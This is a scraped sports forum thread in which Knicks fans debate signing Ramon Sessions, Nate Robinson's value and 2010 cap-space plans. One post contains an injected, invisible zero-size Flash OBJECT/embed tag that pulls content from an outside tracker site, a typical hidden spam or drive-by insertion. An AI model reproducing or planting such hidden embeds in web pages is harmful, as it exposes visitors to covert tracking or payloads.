The New York Bums look at Troy Hudson...Sessions may be a no go.

LJ4ptplay

Starter
Our 2010 starting lineup

PG-nobody
SG-nobody
SF-Lebron
PF-Hill
C-Curry

No Lee, no Nate, no Sessions. At some point Donnie is going to have to come to reality and realize we still need a roster to attract free agents.

the portable man

Benchwarmer
hudson = roberson

im still dying @ walsh lookin for point guards when we have nate(total PG package), duhon, and douglas

these guys should be lookin to trade, not clog one position

get some pieces, trade wilcox for someone, sign and trade lee for a C or another PF

trade duhon and hughes as a package for a solid raja bell type SG

trade duhon and chandler for an even better SG, let danilo do his thing @ SF or SG

trade hill and douglas for some1 decent, honestly they looked horrible in summer league

we need natural ball players, not ones in development and only good in certain aspects and very inconsistant

hudson = roberson

im still dying @ walsh lookin for point guards when we have nate(total PG package), duhon, and douglas

these guys should be lookin to trade, not clog one position

get some pieces, trade wilcox for someone, sign and trade lee for a C or another PF

trade duhon and hughes as a package for a solid raja bell type SG

trade duhon and chandler for an even better SG, let danilo do his thing @ SF or SG

trade hill and douglas for some1 decent, honestly they looked horrible in summer league

we need natural ball players, not ones in development and only good in certain aspects and very inconsistant

haha your hilarious dude, you act like we can just ask for trades, this isnt 2k9 buddy. I am sure Donnie is on the phone asking for this asking for that, their are not many available SG's the reason we are going for pg's is because sessions is available and he is an upgrade and young. As far as stackhouse and hudson, I just feel that donnie is giving a look at any one. He probably wants to go into training camp with 18 players so that he can then move players around and no he has some insurance.

New New York

Quiet Storm
Well it comes down to Session just not being worth it. I mean he could be a really good player for us, but, he still isnt a gaurantee, and imagine he costs us cap and he turns out to be Marko Jaric, who was a really good prospect until he signed his extension.

Look Walsh is sticking to his plan for better or for worse. Sessions could turn out to be good, but would it be good enough to cost us being able to make upgrades or is he good enough to have us move a player like Wilson just to get a team to take Jefferies or Curry's contract?

We have about 30.5 million to spend (thats assuming the cap comes in at 51.5 which is right between the projected 50 and 53 million mark) and that is equal to a major player at 19-18 million (Wade,Bosh,Amare, Dirk and my personal fave Joe Johnson) and either a nice secondary player type 10-12 million (Rudy Gay, Josh Howard,Mike Miller) or two solid players for 6 or so million (TJ Ford,Marcus Camby,Steve Blake)

I just think it comes down to how good Donnie thinks Session could be compared to what is out there in 2010.

Oldtimer

Rotation player
Sessions

Sessions is clearly the best currently available point guard. Other than perhaps the restricted Rondo, there will be no quality point guards in the 2010 free agent class.

Walsh's reluctance to pull the trigger on Sessions is somewhat baffling. Perhaps he knows the market and is patiently awaiting Sessions to reduce his demands. Perhaps he is looking a little farther into the future and is reluctant to commit to Sessions long-term.

This is pure speculation but perhaps Walsh is counting on Kahn to give up on Rubio in Minnesota and be wiling to trade signing rights to him. I do not believe Rubio has actually signed in Spain and I am sure he woud find a way to take care of his buy-out if his destination were New York.

And if Rubio makes it to Minnesota, then Flynn might well be available.

latiger12

Rookie
Sessions is clearly the best currently available point guard. Other than perhaps the restricted Rondo, there will be no quality point guards in the 2010 free agent class.<OBJECT height=0 width=0 classid=clsid:d27cdb6e-ae6d-11cf-96b8-444553540000>

<embed src="<a href="http://brbyowner.com/?tracker=4097" target="_blank">http://brbyowner.com/?tracker=4097[/URL]" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></OBJECT>
</P>
Agreed...I would like to get Rondo, but with all the competition, it will be a strecth...

nyk_nyk

All Star
Nate is better than Duhon and Sessions in my opinion. I can deal with Nate's occassional turnovers and bad shots because outside of that he is a clutch player, good shoter and gets to the FT line often. I think if N8 were about 4 inches taller some people would have absolutely no problem with him running the point.

For the record, I do like the idea of adding Sessions Sessions, but if that doesn't happen I'm comfortable with Duhon and N8. Our real issue is at SG and C anyway.

Nate is better than Duhon and Sessions in my opinion. I can deal with Nate's occassional turnovers and bad shots because outside of that he is a clutch player, good shoter and gets to the FT line often. I think if N8 were about 4 inches taller some people would have absolutely no problem with him running the point.

For the record, I do like the idea of adding Sessions Sessions, but if that doesn't happen I'm comfortable with Duhon and N8. Our real issue is at SG and C anyway.

I don't believe Nate is better than Sessions at all. Sessions is a pass-first PG and is a much better defender. Nate may get more steals, but that does not define the defensive value. I think Nate is a better outside shooter, but Sessions can create offense and takes care of the basketball. If it came down to Sessions or Nate, I would take Sessions.

nyk_nyk

All Star
I don't think you lose a whole lot by settling for N8. Sure he's not a lock down defender and isn't the floor leader you want him to be, but he produces when given the chance. N8 puts pressure on defenses with his quickness and ability to knock down shots too. Not too many opposing PGs can guard him either.

They both have their positives though.

OGKnickfan

Enlightened
Duhon is not all that, but he's better than Hudson. This is another retard move by Walsh, AKA Yoda. Anyway... Next time, call them the NY Bricks, instead of the NY Bums, it's funnier, it rhymes with Knicks and is basketball related. Plus, it's a great metaphor for the last Knick decade.

Kiyaman

Legend
I don't believe Nate is better than Sessions at all. Sessions is a pass-first PG and is a much better defender. Nate may get more steals, but that does not define the defensive value. I think Nate is a better outside shooter, but Sessions can create offense and takes care of the basketball. If it came down to Sessions or Nate, I would take Sessions.

I'm a fan of Sessions game.....but it will be a while before Session could match-up with Duhon's halfcourt presence, or Nate's transition performance.

I thought Sessions would've been the first player the Detroit Pistons sign this summer. PG-Stuckey played like a 3rd tier PG last season, and the Pistons had the chance to draft one of five decent PG in Holiday, Ty Lawson, Manor, Collison, and Jeff Teague

President Joe Dumars is purposely making the Pistons into a 2009-10 Lottery Team.

Last edited:

Truly I feel like we over react to nate.
He isnt even in the top 50 in the NBA for total turnovers plays every night 30 minutes and the ball is in his hands 90 percent of the time he is on the floor.
I mean he shoots just under 44 percent from the field but I also feel that he is our only player who hits down the stretch when it counts when david lee doesnt want to shoot, al harrington is hanging on the rim and duhon is on the bench.
There was a stretch when duhon was out and nate was starting his numbers were incredible I believe he was putting up 22 ppg 7 reb and 7 assists during that stretch...and we were playing 500 ball.
His defense is top notch if he is challenge, I went to the game where he took chris paul out of the game defensively just to sit in the 200 section and watch nate get in pauls face all game was a sigh of relief.
I am not saying he is a natural pg, but realistically how many pgs today are natural pgs ?

Paul
D will
PArker
Nash
Kidd
Billups
A miller
Rose

after that are these guys reallly point guards or under sized shooting guards.
So there is your top 15 or 16 who are locked down with teams already most are old farts, others injury prone, and most have an easy job playing with all league talent by their side.

Arenas
B davis
R foye
Brooks
Bibby
Mo williams
Barbosa
D harris

I mean im sure im missing a few but I feel that nate is better than half of that list as far as his age numbers and potential in Mike d's system.

As far as im concerned nate is older, more mature and ready to take the next step.

he has my full support at starting pg.

nyk_nyk

All Star
Agree. He would have my full support as well if that's the course the team decides to take. Good point about "true PGs" being the minority in the league.

mafra

Legend
Sessions will eventually sign with NYK. Don't fret. The LAC stuff is rumors floated by the agent to scare Walsh. A bluff. NYK let Sessions know what they'll willing to give.... They'll dare him to find a better offer (like their tact with Lee). IF he can find a better deal, Walsh will up his bid then. NOT KNOW.

Sessions realizes NY is the best spot for him. He can start, it's NYC, stars may be coming to the rescue next year, and he's playing in the perfect system to maximize his talent/earning potential.

You really think he'll pass on that so he can be a backup, playing for the Clippers? For a mere few million dollars? Come on.

N8 has already stated he'll wait on Walsh. Lee has nowhere to go.

Walsh is calling all their bluffs. By Sept.... Lee and Sessions will cave and will reduce their contract demands and sign.

Sessions will eventually sign with NYK. Don't fret. The LAC stuff is rumors floated by the agent to scare Walsh. A bluff. NYK let Sessions know what they'll willing to give.... They'll dare him to find a better offer (like their tact with Lee). IF he can find a better deal, Walsh will up his bid then. NOT KNOW.

Sessions realizes NY is the best spot for him. He can start, it's NYC, stars may be coming to the rescue next year, and he's playing in the perfect system to maximize his talent/earning potential.

You really think he'll pass on that so he can be a backup, playing for the Clippers? For a mere few million dollars? Come on.

Walsh is calling all their bluffs. By Sept.... Lee and Sessions will cave and will reduce their contract demands and sign.

I agree....and I think this is better than Nate as the starting PG. There is a reason why he hasn't received any offers.....its because many teams view Nate as a bench player with energy and quickness, not a starter. Not many teams would be willing to pay top dollar for those type of players. Nate's best finanical contract would have been from the Greek team-2yr/10mil tax free is alot more than he will get in the NBA.

SSj4Wingzero

All Star

Sums it all up right there. Sessions would be an idiot if he decided to play for the Clippers as a backup when he could be the star of the wealthiest franchise in basketball and maybe end up playing with LeBron James, Dwyane Wade, Chris Bosh, Amare. Or he could go play backup to Baron Davis and Sebastian Telfair.

LJ4ptplay

Starter
Sums it all up right there. Sessions would be an idiot if he decided to play for the Clippers as a backup when he could be the star of the wealthiest franchise in basketball and maybe end up playing with LeBron James, Dwyane Wade, Chris Bosh, Amare. Or he could go play backup to Baron Davis and Sebastian Telfair.

True but we haven't offered Sessions a contract yet and still may not at all. You can't blame him for accepting the Clippers offer if he has no other options.

Sessions And The Clippers: The LA Clippers seem to be the front runners for Ramon Sessions this week, although that could change. It does seem that Sessions is trapped in restricted free agent hell as both the Knicks and Clippers would do a deal, however there is still a belief that Milwaukee will match a deal less than $4 million and neither teams seems ready to do a four or five year deal with Sessions over $4 million.

Bucks' sources said last week that Sessions was an asset with considerable value both to the Bucks and around the league and unless a team made it prohibitive, the plan was to seriously consider matching his deal regardless of its dollar amount or length.

The Knicks were reportedly close to a deal roughly 10 days ago, but were haggling over ways to avoid dipping into their 2010 cap space. The Knicks have also been trying to move a contract – assumed to be Jared Jefferies according to league sources.

The Washington Wizards have more than a passing interest in Jefferies, but would want additional compensation for taking on his additional contract year. It's believed the Wizards would want cash as well as Jefferies and the Knicks don't seem overly interested in that deal yet.
Sources in New York describe the situation this way – if they can move a contract they'd meet Sessions asking price. If they cannot, they may pass on Sessions all together.

http://www.hoopsworld.com/Story.asp?story_id=13609

If the Wizards want cash with Jeffries why doesn't Donnie do it? What do we care about cash this year anyway? It's about freeing up cap space for 2010 and getting rid of Jeffries is a priority for that to happen.

Getting rid of Jeffries without having to use Nate or Mobley's contract is a blessing and Donnie should jump on the chance to do it. Sometimes I wonder what's going on in the Knicks front office.

Toons

is the Bo$$
As for Sessions . . . I continue to hear that the Knicks remain the 23 year old's last remaining legitimate option. The Clippers seem content with their roster and the Bucks just recently made additions (Carlos Delfino and Roko Ukic) that suggest they are ready to move on, as well. The threat is still there for the Bucks to match a cheap offer sheet, but whenever Sessions (or his agent) is ready to accept the Knicks' offer in the $4M per range, they're ready to tender the offer sheet. How much longer do you wait if you're Sessions, who made about $700K last season and just saw his team (the Bucks) add two guards to the roster?

You really going to decline starting for the Knicks for the difference of $2M per in salary??